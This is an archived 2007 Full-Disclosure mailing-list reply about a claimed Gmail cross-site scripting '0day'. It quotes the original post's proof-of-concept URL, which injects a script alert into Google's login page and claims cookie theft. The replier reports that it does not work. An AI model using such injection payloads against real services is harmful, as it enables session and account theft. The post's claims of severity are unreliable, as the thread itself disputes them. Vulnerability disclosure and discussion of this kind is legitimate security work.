Re: [Full-disclosure] Gmail 0day

From: "crazy frog crazy frog" <i.m.crazy.frog@xxxxxxxxx>
Date: Thu, 8 Nov 2007 23:08:15 +0530

i tested it on gmail latest version,itsnot working for me?

On Nov 8, 2007 7:04 AM, Scripter Hack <xss2root@xxxxxxxxx> wrote:

There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore other
service.

POC:
https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#";></script><script>alert('xss')</script>&1-=1

More:http://xss2root.blogspot.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Gmail 0day
  - From: silky

References:
- [Full-disclosure] Gmail 0day
  - From: Scripter Hack

Prev by Date: Re: [Full-disclosure] spammer wades into US Presidential race
Next by Date: [Full-disclosure] Hushmail == Narqz
Previous by thread: [Full-disclosure] Gmail 0day
Next by thread: Re: [Full-disclosure] Gmail 0day
Index(es):
- Date
- Thread

Relevant Pages

Re: [Full-disclosure] AntiAntiSec / Endgame
... protect little snots like yourselves. ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure)
Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
... and restraint by not responding to your personal jabs, ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure)
Re: [Full-disclosure] Barack Obama <-- Not Appropriate
... That basically proves you are here to do propaganda - either voluntarily ... Mossad and being paid to post on full-disclosure. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure)
Re: [Full-disclosure] e-Holocaust
... The .com domains were actually Israeli, ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure)
Re: [Full-disclosure] The war in Palestine
... But people like Schneider ask for this hate. ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure)